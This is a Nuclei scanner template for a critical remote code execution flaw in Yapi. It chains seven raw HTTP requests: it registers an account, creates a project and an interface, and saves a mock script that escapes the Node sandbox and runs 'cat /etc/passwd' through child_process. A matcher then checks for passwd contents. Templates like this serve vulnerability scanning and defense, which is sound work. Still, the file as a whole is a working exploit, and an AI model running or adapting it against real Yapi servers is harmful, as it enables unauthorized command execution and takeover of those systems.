111 lines
3.6 KiB
YAML
111 lines
3.6 KiB
YAML
id: yapi-rce
|
|
|
|
info:
|
|
name: Yapi Remote Code Execution
|
|
author: pikpikcu
|
|
severity: critical
|
|
tags: yapi,rce
|
|
reference: |
|
|
- https://www.secpulse.com/archives/162502.html
|
|
- https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b
|
|
- https://twitter.com/sec715/status/1415484190561161216
|
|
- https://github.com/YMFE/yapi
|
|
|
|
requests:
|
|
- raw:
|
|
- | # REQUEST 1
|
|
POST /api/user/reg HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
|
Content-Length: 94
|
|
Content-Type: application/json;charset=UTF-8
|
|
Accept-Encoding: gzip
|
|
|
|
{"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"}
|
|
|
|
- | # REQUEST 2
|
|
GET /api/group/list HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
|
Content-Type: application/json, text/plain, */*
|
|
Accept-Encoding: gzip
|
|
|
|
- | # REQUEST 3
|
|
POST /api/project/add HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
|
Content-Length: 106
|
|
Content-Type: application/json;charset=UTF-8
|
|
Accept-Encoding: gzip
|
|
|
|
{"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"}
|
|
|
|
- | # REQUEST 4
|
|
GET /api/project/get?id={{project_id}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
|
Accept-Encoding: gzip
|
|
|
|
- | # REQUEST 5
|
|
POST /api/interface/add HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
|
Content-Length: 89
|
|
Content-Type: application/json;charset=UTF-8
|
|
Accept-Encoding: gzip
|
|
|
|
{"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}}
|
|
|
|
- | # REQUEST 6
|
|
POST /api/plugin/advmock/save HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
|
Content-Length: 382
|
|
Content-Type: application/json;charset=UTF-8
|
|
Accept-Encoding: gzip
|
|
|
|
{"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true}
|
|
|
|
- | # REQUEST 7
|
|
GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
|
Accept-Encoding: gzip
|
|
|
|
cookie-reuse: true
|
|
extractors:
|
|
- type: regex
|
|
name: group_id
|
|
group: 1
|
|
internal: true
|
|
part: body
|
|
regex:
|
|
- '"_id":([0-9]+),"group_name"'
|
|
|
|
- type: regex
|
|
name: interface_id
|
|
group: 1
|
|
internal: true
|
|
part: body
|
|
regex:
|
|
- '"req_body_form":\[\],"_id":([0-9]+)'
|
|
|
|
- type: regex
|
|
name: project_id
|
|
group: 1
|
|
internal: true
|
|
part: body
|
|
regex:
|
|
- '"tag":\[\],"_id":([0-9]+)'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
part: body
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|